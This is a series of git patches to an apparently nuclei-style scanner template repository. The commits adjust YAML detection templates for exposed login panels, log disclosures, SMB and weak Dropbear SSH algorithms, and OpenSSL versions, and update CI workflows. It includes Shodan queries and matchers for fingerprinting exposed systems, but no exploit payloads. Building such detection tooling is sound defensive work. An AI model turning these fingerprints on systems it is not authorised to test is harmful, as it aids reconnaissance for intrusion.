+ - 200 From 00ab7ec92b36495075df3ed33fdc9e8e7b89b13a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 21 Nov 2022 16:11:54 +0530 Subject: [PATCH 0508/1415] Update elmah-log-file.yaml --- exposures/logs/elmah-log-file.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/elmah-log-file.yaml b/exposures/logs/elmah-log-file.yaml index f8c711bf19..09c4b8d968 100644 --- a/exposures/logs/elmah-log-file.yaml +++ b/exposures/logs/elmah-log-file.yaml @@ -2,7 +2,7 @@ id: elmah-log-file info: name: elmah.axd Disclosure - author: shine, idealphase + author: shine,idealphase severity: medium description: | ELMAH (Error Logging Modules and Handlers) is an application-wide error logging facility that is completely pluggable. It can be dynamically added to a running ASP.NET web application, or even all ASP.NET web applications on a machine, without any need for re-compilation or re-deployment. From 89079f5592546e4a27ccd2c4af253084c7ec1b03 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 21 Nov 2022 16:16:38 +0530 Subject: [PATCH 0509/1415] Update mach-proweb-login.yaml --- exposed-panels/mach-proweb-login.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/exposed-panels/mach-proweb-login.yaml b/exposed-panels/mach-proweb-login.yaml index 1b421e3eb2..cde68bff1f 100644 --- a/exposed-panels/mach-proweb-login.yaml +++ b/exposed-panels/mach-proweb-login.yaml @@ -4,12 +4,14 @@ info: name: MACH-ProWeb Login panel author: Jaskaran severity: info - description: MACH-ProWeb is building controller system used to access and control respective facilities easily + description: | + MACH-ProWeb is building controller system used to access and control respective facilities easily reference: - https://www.exploit-db.com/ghdb/8023 metadata: + verified: true google-query: intitle:"Log on to MACH-ProWeb" - tags: panel,mach-proweb + tags: panel,machproweb,edb requests: - method: GET @@ -20,7 +22,7 @@ requests: matchers: - type: regex regex: - - 'Log on to MACH-ProWeb' + - 'Log on to MACH-ProWeb' - type: status status: From 1093a8f901b953dfcee1e19e094fd47f9a4f9a73 Mon Sep 17 00:00:00 2001 From: Tarun Koyalwar <45962551+tarunKoyalwar@users.noreply.github.com> Date: Mon, 21 Nov 2022 17:00:34 +0530 Subject: [PATCH 0510/1415] update gh actions (closes #6108) (#6120) --- .github/workflows/cve-annotate.yml | 12 ++++++------ .github/workflows/readme-update.yml | 6 +++--- .github/workflows/template-validate.yml | 6 +++--- .github/workflows/templates-stats.yml | 6 +++--- 4 files changed, 15 insertions(+), 15 deletions(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 9bc55c6447..eede299bea 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -15,12 +15,12 @@ jobs: - name: Get Github tag id: meta run: | - echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)" + curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT - name: Setup CVE annotate - if: steps.meta.outputs.tag != '' + if: steps.meta.outputs.TAG != '' env: - VERSION: ${{ steps.meta.outputs.tag }} + VERSION: ${{ steps.meta.outputs.TAG }} run: | wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip sudo unzip cve-annotate.zip -d /usr/local/bin @@ -30,10 +30,10 @@ jobs: id: cve-annotate run: | cve-annotate -i . -d . - echo "::set-output name=changes::$(git status -s | wc -l)" + git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT - name: Commit files - if: steps.cve-annotate.outputs.changes > 0 + if: steps.cve-annotate.outputs.CHANGES > 0 run: | git config --local user.email "action@github.com" git config --local user.name "GitHub Action" @@ -42,7 +42,7 @@ jobs: git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a - name: Push changes - if: steps.cve-annotate.outputs.changes > 0 + if: steps.cve-annotate.outputs.CHANGES > 0 uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/readme-update.yml b/.github/workflows/readme-update.yml index 9cec001f00..d82ad6019b 100644 --- a/.github/workflows/readme-update.yml +++ b/.github/workflows/readme-update.yml @@ -30,17 +30,17 @@ jobs: id: readme-update run: | python .github/scripts/update-readme.py - echo "::set-output name=changes::$(git status -s | wc -l)" + git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT - name: Commit files - if: steps.readme-update.outputs.changes > 0 + if: steps.readme-update.outputs.CHANGES > 0 run: | git config --local user.email "action@github.com" git config --local user.name "GitHub Action" git commit -m "Auto README Update [$(date)] :robot:" -a - name: Push changes - if: steps.readme-update.outputs.changes > 0 + if: steps.readme-update.outputs.CHANGES > 0 uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index bab829208b..cc353a3a70 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -11,12 +11,12 @@ jobs: - name: Get Github tag id: meta run: | - echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)" + curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT - name: Setup Nuclei - if: steps.meta.outputs.tag != '' + if: steps.meta.outputs.TAG != '' env: - VERSION: ${{ steps.meta.outputs.tag }} + VERSION: ${{ steps.meta.outputs.TAG }} run: | wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip sudo unzip nuclei*.zip -d /usr/local/bin diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index ff91ce30ed..e393fa68d3 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@master - uses: actions/setup-go@v2 with: - go-version: 1.17 + go-version: 1.18 - name: Installing Template Stats run: | @@ -37,10 +37,10 @@ jobs: - name: Get statistical changes id: stats - run: echo "::set-output name=changes::$(git status -s | wc -l)" + run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT - name: Commit files - if: steps.stats.outputs.changes > 0 + if: steps.stats.outputs.CHANGES > 0 run: | git add TEMPLATES-STATS.* git add TOP-10.md From 2070718f9bcf1ebb748ec4195ea8869f6f525796 Mon Sep 17 00:00:00 2001 From: aertyu1 <50700042+aertyu1@users.noreply.github.com> Date: Mon, 21 Nov 2022 16:12:12 +0100 Subject: [PATCH 0512/1415] Update public-tomcat-manager.yaml Adding to match on all headers as the string is often present in the following header: Www-Authenticate: Basic realm="Tomcat Manager Application" --- exposed-panels/apache/public-tomcat-manager.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/apache/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml index 0ef97a598a..c9aa415a2e 100644 --- a/exposed-panels/apache/public-tomcat-manager.yaml +++ b/exposed-panels/apache/public-tomcat-manager.yaml @@ -24,6 +24,7 @@ requests: - "Apache Tomcat" - "Tomcat Manager" condition: or + part: all_headers - type: status status: From e5a9c66d5bc2e1ab9927cc0e78b29e573556a896 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 22 Nov 2022 00:43:21 +0530 Subject: [PATCH 0513/1415] Update and rename smb-v1-detect.yaml to smb-detect.yaml --- network/detection/{smb-v1-detect.yaml => smb-detect.yaml} | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) rename network/detection/{smb-v1-detect.yaml => smb-detect.yaml} (82%) diff --git a/network/detection/smb-v1-detect.yaml b/network/detection/smb-detect.yaml similarity index 82% rename from network/detection/smb-v1-detect.yaml rename to network/detection/smb-detect.yaml index e632cbc70d..f9614aaf78 100644 --- a/network/detection/smb-v1-detect.yaml +++ b/network/detection/smb-detect.yaml @@ -1,11 +1,9 @@ -id: smb-v1-detect +id: smb-detect info: - name: SMB-V1 Detection + name: SMB Detection author: pussycat0x severity: low - reference: - - https://stealthbits.com/blog/what-is-smbv1-and-why-you-should-disable-it/ tags: network,windows,smb,service description: | SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems. From 2f05a078e8005adfe225bc7a38afac0219f06405 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 22 Nov 2022 00:51:47 +0530 Subject: [PATCH 0514/1415] Update smb-detect.yaml --- network/detection/smb-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml index f9614aaf78..adba96b5a8 100644 --- a/network/detection/smb-detect.yaml +++ b/network/detection/smb-detect.yaml @@ -21,3 +21,4 @@ network: - type: word words: - "SMBr" + condition: and From 1028e0f88964aa45346fa22e54d526918808bee3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 21 Nov 2022 23:14:21 -0500 Subject: [PATCH 0515/1415] Update crlf-injection.yaml added hackerone report as reference. --- vulnerabilities/generic/crlf-injection.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml index 4c0078ec88..230fce2901 100644 --- a/vulnerabilities/generic/crlf-injection.yaml +++ b/vulnerabilities/generic/crlf-injection.yaml @@ -5,6 +5,8 @@ info: author: melbadry9,nadino,xElkomy severity: low description: CRLF sequences were not properly sanitized. + reference: + - https://hackerone.com/reports/858650 tags: crlf,generic requests: From 8297d3d8b43c0474b26a49962fe0a7845bc742c9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 22 Nov 2022 04:51:59 +0000 Subject: [PATCH 0517/1415] Auto Generated CVE annotations [Tue Nov 22 04:51:59 UTC 2022] :robot: --- vulnerabilities/generic/crlf-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml index 230fce2901..bf604d0ccf 100644 --- a/vulnerabilities/generic/crlf-injection.yaml +++ b/vulnerabilities/generic/crlf-injection.yaml @@ -7,7 +7,7 @@ info: description: CRLF sequences were not properly sanitized. reference: - https://hackerone.com/reports/858650 - tags: crlf,generic + tags: crlf,generic,hackerone requests: - method: GET From 0e6bfc6897a9fd7d558b1e8798f657c445a45e0d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 22 Nov 2022 12:30:42 +0530 Subject: [PATCH 0518/1415] Update public-tomcat-manager.yaml --- exposed-panels/apache/public-tomcat-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/apache/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml index c9aa415a2e..0ada62d1a9 100644 --- a/exposed-panels/apache/public-tomcat-manager.yaml +++ b/exposed-panels/apache/public-tomcat-manager.yaml @@ -24,7 +24,7 @@ requests: - "Apache Tomcat" - "Tomcat Manager" condition: or - part: all_headers + part: response - type: status status: From 2b6536fc8753738b89a0605e37c53d713ef089e9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 22 Nov 2022 13:31:11 +0530 Subject: [PATCH 0519/1415] Update smb-detect.yaml --- network/detection/smb-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml index adba96b5a8..36e29de83d 100644 --- a/network/detection/smb-detect.yaml +++ b/network/detection/smb-detect.yaml @@ -21,4 +21,5 @@ network: - type: word words: - "SMBr" + - "NT LM" condition: and From 489866643a992e5e2bf6333a60f1cbd1311ebf01 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 22 Nov 2022 08:29:17 +0000 Subject: [PATCH 0520/1415] Auto Generated New Template Addition List [Tue Nov 22 08:29:17 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 0969d877de..d576149f58 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ exposed-panels/fastpanel-hosting-control-panel.yaml +token-spray/api-giphy.yaml From f9f0884ba2d48e11921798da6a1e1dd51dacd0bd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 22 Nov 2022 08:46:54 +0000 Subject: [PATCH 0521/1415] Auto Generated CVE annotations [Tue Nov 22 08:46:54 UTC 2022] :robot: --- cves/2022/CVE-2022-41840.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml index b636400b80..b664082bef 100644 --- a/cves/2022/CVE-2022-41840.yaml +++ b/cves/2022/CVE-2022-41840.yaml @@ -3,7 +3,7 @@ id: CVE-2022-41840 info: name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal author: theamanrawat - severity: high + severity: critical description: | Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin <= 2.7.7 on WordPress. reference: @@ -12,7 +12,10 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840 - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-41840 + cwe-id: CWE-22 metadata: verified: "true" tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop From 4fa2cb6cc5b46d6a968729fea9f40433bce2c949 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 22 Nov 2022 15:35:22 +0530 Subject: [PATCH 0522/1415] Update payara-micro-server-detect.yaml --- technologies/payara-micro-server-detect.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/technologies/payara-micro-server-detect.yaml b/technologies/payara-micro-server-detect.yaml index 821cb60a22..d09fc548e7 100644 --- a/technologies/payara-micro-server-detect.yaml +++ b/technologies/payara-micro-server-detect.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: info metadata: - shodan-query: app="paYara-Micro-Server" + shodan-query: title:"Payara Micro #badassfish - Error report" tags: tech,payara requests: @@ -18,4 +18,8 @@ requests: - type: word part: body words: - - "Payara Micro #badassfish - Error report" + - "Payara Micro #badassfish - Error report" + + - type: status + status: + - 404 From 623c9f6e7c48bc6c1fca80e319f874239d902a10 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 22 Nov 2022 15:35:48 +0530 Subject: [PATCH 0523/1415] Update payara-micro-server-detect.yaml --- technologies/payara-micro-server-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/payara-micro-server-detect.yaml b/technologies/payara-micro-server-detect.yaml index d09fc548e7..dff5997c35 100644 --- a/technologies/payara-micro-server-detect.yaml +++ b/technologies/payara-micro-server-detect.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: info metadata: + verified: true shodan-query: title:"Payara Micro #badassfish - Error report" tags: tech,payara From cb988440cd673363e8d79946470980e8fcb90153 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 22 Nov 2022 15:40:30 +0530 Subject: [PATCH 0525/1415] Update payara-micro-server-detect.yaml --- technologies/payara-micro-server-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/payara-micro-server-detect.yaml b/technologies/payara-micro-server-detect.yaml index dff5997c35..d6bb2e5e57 100644 --- a/technologies/payara-micro-server-detect.yaml +++ b/technologies/payara-micro-server-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: verified: true - shodan-query: title:"Payara Micro #badassfish - Error report" + shodan-query: 'title:"Payara Micro #badassfish - Error report"' tags: tech,payara requests: From 964afc89b9c7abcc19f9c9fa009b3d9d599f166f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 22 Nov 2022 10:13:26 +0000 Subject: [PATCH 0526/1415] Auto Generated New Template Addition List [Tue Nov 22 10:13:26 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d576149f58..7d82487148 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ exposed-panels/fastpanel-hosting-control-panel.yaml +technologies/payara-micro-server-detect.yaml token-spray/api-giphy.yaml From 82c6581238bb6d980eacb1ad9c9058f91b1245e1 Mon Sep 17 00:00:00 2001 From: Retrospected Date: Tue, 22 Nov 2022 11:47:31 +0100 Subject: [PATCH 0527/1415] fixing typo --- exposed-panels/{exsi-system.yaml => esxi-system.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/{exsi-system.yaml => esxi-system.yaml} (97%) diff --git a/exposed-panels/exsi-system.yaml b/exposed-panels/esxi-system.yaml similarity index 97% rename from exposed-panels/exsi-system.yaml rename to exposed-panels/esxi-system.yaml index 793ea9cc54..1cb7ed2e33 100644 --- a/exposed-panels/exsi-system.yaml +++ b/exposed-panels/esxi-system.yaml @@ -1,4 +1,4 @@ -id: exsi-system +id: esxi-system info: name: ESXi System Login Panel - Detect From e732805c5031bc148ef9f6c3d52b0b1fcb40f41f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 22 Nov 2022 19:29:16 +0530 Subject: [PATCH 0529/1415] Update s3-torrent.yaml --- misconfiguration/s3-torrent.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/misconfiguration/s3-torrent.yaml b/misconfiguration/s3-torrent.yaml index 5d6b5df433..7c77662ad8 100644 --- a/misconfiguration/s3-torrent.yaml +++ b/misconfiguration/s3-torrent.yaml @@ -1,21 +1,21 @@ id: s3-torrent info: - name: Detect S3 torrent downloads allowed + name: S3 torrent Downloads Allowed author: ambassify severity: info description: Detects if endpoint allows magic S3 torrent argument to download files - tags: aws,s3,bucket + tags: misconfig,aws,s3,bucket requests: - method: GET path: - "{{BaseURL}}/?torrent" - matchers-condition: and matchers: - type: word + part: body words: - 'RequestTorrentOfBucketError' - 's3-tracker' - part: body + condition: or From cd5005f50b66957ba0bb9b7fb36a04f9f2bc774e Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Tue, 22 Nov 2022 18:57:44 +0100 Subject: [PATCH 0530/1415] Add files via upload --- technologies/exolis-engage-detect.yaml | 31 ++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 technologies/exolis-engage-detect.yaml diff --git a/technologies/exolis-engage-detect.yaml b/technologies/exolis-engage-detect.yaml new file mode 100644 index 0000000000..785cdcd5b4 --- /dev/null +++ b/technologies/exolis-engage-detect.yaml @@ -0,0 +1,31 @@ +id: exolis-engage + +info: + name: Detect instance of the Engage software from the Exolis company. + author: righettod + severity: info + reference: + - https://www.exolis.fr/en/solution-2/ + metadata: + verified: true + tags: exolis,engage,tech + +requests: + - method: GET + path: + - "{{BaseURL}}/app.js" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "engage-specific-config" + - "engage-lastAppUserType" + - "engage-lastHelperPatientContext" + - "engage-preferred-language" + condition: or + + - type: status + status: + - 200 From 580eeb04bcf3b91691ed826514bd9c59f046c5e2 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Tue, 22 Nov 2022 19:03:52 +0100 Subject: [PATCH 0531/1415] Fix linter error --- technologies/exolis-engage-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/exolis-engage-detect.yaml b/technologies/exolis-engage-detect.yaml index 785cdcd5b4..d150747a17 100644 --- a/technologies/exolis-engage-detect.yaml +++ b/technologies/exolis-engage-detect.yaml @@ -5,7 +5,7 @@ info: author: righettod severity: info reference: - - https://www.exolis.fr/en/solution-2/ + - https://www.exolis.fr/en/solution-2/ metadata: verified: true tags: exolis,engage,tech From a85b69f9a35c3089a794de28ef463c6649eb472d Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Tue, 22 Nov 2022 19:11:57 +0100 Subject: [PATCH 0532/1415] Add missing terms to detect the "Soignant" module too See https://engage-soignants.exolis.fr --- technologies/exolis-engage-detect.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/technologies/exolis-engage-detect.yaml b/technologies/exolis-engage-detect.yaml index d150747a17..c030aac392 100644 --- a/technologies/exolis-engage-detect.yaml +++ b/technologies/exolis-engage-detect.yaml @@ -24,6 +24,8 @@ requests: - "engage-lastAppUserType" - "engage-lastHelperPatientContext" - "engage-preferred-language" + - "engageManager.admin" + - "engageManager.user" condition: or - type: status From 637df084c57ce03e659e5d826afc8f45cb08895c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 22 Nov 2022 23:58:08 +0530 Subject: [PATCH 0533/1415] Add files via upload --- network/detection/dropbear-cbc-ciphers.yaml | 24 +++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 network/detection/dropbear-cbc-ciphers.yaml diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml new file mode 100644 index 0000000000..49ead75eae --- /dev/null +++ b/network/detection/dropbear-cbc-ciphers.yaml @@ -0,0 +1,24 @@ +id: dropbear-cbc-ciphers + +info: + name: Dropbear sshd CBC Mode Ciphers Detection + author: pussycat0x + severity: low + description: | + The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext. + metadata: + verified: true + shodan-query: 'product:"Dropbear sshd"' + tags: network,ssh,dropbear + +network: + + - inputs: + - data: "\n" + host: + - "{{Hostname}}" + - "{{Host}}:22" + matchers: + - type: word + words: + - "cbc" From 3e0a65a78cde9c3f2a8a79085fe3a6628e14a502 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 22 Nov 2022 23:58:59 +0530 Subject: [PATCH 0534/1415] Add files via upload --- .../detection/dropbear-weakalgo-detect.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 network/detection/dropbear-weakalgo-detect.yaml diff --git a/network/detection/dropbear-weakalgo-detect.yaml b/network/detection/dropbear-weakalgo-detect.yaml new file mode 100644 index 0000000000..b785ea1ec7 --- /dev/null +++ b/network/detection/dropbear-weakalgo-detect.yaml @@ -0,0 +1,26 @@ +id: dropbear-weakalgo-detect + +info: + name: Dropbear sshd Weak Key Exchange Algorithms Detection + author: pussycat0x + severity: low + description: | + The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable. + metadata: + verified: true + shodan-query: 'product:"Dropbear sshd"' + tags: network,ssh,dropbear + +network: + + - inputs: + - data: "\n" + host: + - "{{Hostname}}" + - "{{Host}}:22" + matchers: + - type: word + words: + - "diffie-hellman-group-exchange-sha1" + - "diffie-hellman-group1-sha1" + condition: or From 9992d2b9e5e4d4c90d2700ce4114f558e8c579c5 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 22 Nov 2022 23:59:56 +0530 Subject: [PATCH 0535/1415] Add files via upload --- .../detection/dropbear-weakmac-detect.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 network/detection/dropbear-weakmac-detect.yaml diff --git a/network/detection/dropbear-weakmac-detect.yaml b/network/detection/dropbear-weakmac-detect.yaml new file mode 100644 index 0000000000..4f22c9071f --- /dev/null +++ b/network/detection/dropbear-weakmac-detect.yaml @@ -0,0 +1,26 @@ +id: dropbear-weakmac-detect + +info: + name: Dropbear Weak MAC Algorithms Detection + author: pussycat0x + severity: info + description: | + The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client. + metadata: + verified: true + shodan-query: 'product:"Dropbear sshd"' + tags: network,ssh,dropbear + +network: + + - inputs: + - data: "\n" + host: + - "{{Hostname}}" + - "{{Host}}:22" + matchers: + - type: word + words: + - "hmac-md5" + - "hmac-sha1" + condition: or From b1a1903b859d893ea4de79b1920f10ee3bd7785f Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 23 Nov 2022 00:03:32 +0530 Subject: [PATCH 0536/1415] Update dropbear-weakmac-detect.yaml --- network/detection/dropbear-weakmac-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/detection/dropbear-weakmac-detect.yaml b/network/detection/dropbear-weakmac-detect.yaml index 4f22c9071f..dde957d983 100644 --- a/network/detection/dropbear-weakmac-detect.yaml +++ b/network/detection/dropbear-weakmac-detect.yaml @@ -3,7 +3,7 @@ id: dropbear-weakmac-detect info: name: Dropbear Weak MAC Algorithms Detection author: pussycat0x - severity: info + severity: low description: | The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client. metadata: From 8417622633c3cc1891334266b6f62a8c6cfd33e2 Mon Sep 17 00:00:00 2001 From: Spencer Heywood Date: Tue, 22 Nov 2022 12:54:02 -0700 Subject: [PATCH 0537/1415] added template to check for spookyssl cve Signed-off-by: Spencer Heywood --- contributors.json | 11 +++++++++++ cves/2022/CVE-2022-3602.yaml | 28 ++++++++++++++++++++++++++++ 2 files changed, 39 insertions(+) create mode 100644 cves/2022/CVE-2022-3602.yaml diff --git a/contributors.json b/contributors.json index 8611e5cf4c..abd26306fc 100644 --- a/contributors.json +++ b/contributors.json @@ -1368,5 +1368,16 @@ "website": "", "email": "" } + }, + { + "author": "heywoodlh", + "links": { + "github": "https://www.github.com/heywoodlh", + "twitter": "", + "linkedin": "", + "website": "https://the-empire.systems", + "email": "" + } } + ] diff --git a/cves/2022/CVE-2022-3602.yaml b/cves/2022/CVE-2022-3602.yaml new file mode 100644 index 0000000000..037d3c3dd7 --- /dev/null +++ b/cves/2022/CVE-2022-3602.yaml @@ -0,0 +1,28 @@ +id: spookyssl-detect + +info: + name: SpookySSL CVE-2022-3602/CVE-2022-3786 + author: heywoodlh + severity: high + description: A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking in OpenSSL versions 3.0.0-3.0.6. This check searches for web servers with headers indicating OpenSSL versions 3.0.0-3.0.6. + metadata: + shodan-query: vuln:CVE-2022-3602 + tags: openssl,spookyssl,cve-2022-3602,cve-2022-3786 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + + - type: word + part: server + words: + - "OpenSSL" + + extractors: + - type: regex + part: header + regex: + - 'OpenSSL\/(3.0.[0-6].*)' From bf753a848001e0d8656e820ab1e160b4442d5d78 Mon Sep 17 00:00:00 2001 From: Spencer Heywood Date: Tue, 22 Nov 2022 13:50:17 -0700 Subject: [PATCH 0538/1415] removed trailing spaces in CVE-2022-3602 Signed-off-by: Spencer Heywood --- cves/2022/CVE-2022-3602.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-3602.yaml b/cves/2022/CVE-2022-3602.yaml index 037d3c3dd7..8e8bbf6481 100644 --- a/cves/2022/CVE-2022-3602.yaml +++ b/cves/2022/CVE-2022-3602.yaml @@ -1,7 +1,7 @@ id: spookyssl-detect info: - name: SpookySSL CVE-2022-3602/CVE-2022-3786 + name: SpookySSL CVE-2022-3602/CVE-2022-3786 author: heywoodlh severity: high description: A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking in OpenSSL versions 3.0.0-3.0.6. This check searches for web servers with headers indicating OpenSSL versions 3.0.0-3.0.6. From a427ab3accba568de79108f38d9aacefe7a8b186 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 22 Nov 2022 18:03:44 -0500 Subject: [PATCH 0539/1415] Dashboard Content Enhancements (#6131) Dashboard Content Enhancements --- exposed-panels/ibm/ibm-security-access-manager.yaml | 10 ++++++++-- exposed-panels/ibm/ibm-service-assistant.yaml | 9 ++++++++- exposed-panels/ibm/ibm-websphere-admin-panel.yaml | 9 ++++++++- exposed-panels/ibm/ibm-websphere-panel.yaml | 11 +++++++++-- exposed-panels/icc-pro-login.yaml | 9 ++++++++- exposed-panels/icewarp-panel-detect.yaml | 9 ++++++++- exposed-panels/icinga-web-login.yaml | 9 ++++++++- exposed-panels/identity-services-engine.yaml | 9 ++++++++- exposed-panels/ilch-admin-panel.yaml | 9 ++++++++- exposed-panels/incapptic-connect-panel.yaml | 9 ++++++++- exposed-panels/intelbras-login.yaml | 9 ++++++++- exposed-panels/intelbras-panel.yaml | 9 ++++++++- exposed-panels/intellian-aptus-panel.yaml | 9 ++++++++- exposed-panels/intelliflash-login-panel.yaml | 9 ++++++++- exposed-panels/iomega-emc-shared-nas.yaml | 9 ++++++++- exposed-panels/ipdiva-mediation-panel.yaml | 9 ++++++++- exposed-panels/iptime-router.yaml | 9 ++++++++- exposed-panels/issabel-login.yaml | 9 ++++++++- exposed-panels/istat-panel-detect.yaml | 9 ++++++++- exposed-panels/itop-panel.yaml | 12 +++++++++--- exposed-panels/ixbus/ixbusweb-version.yaml | 9 ++++++++- 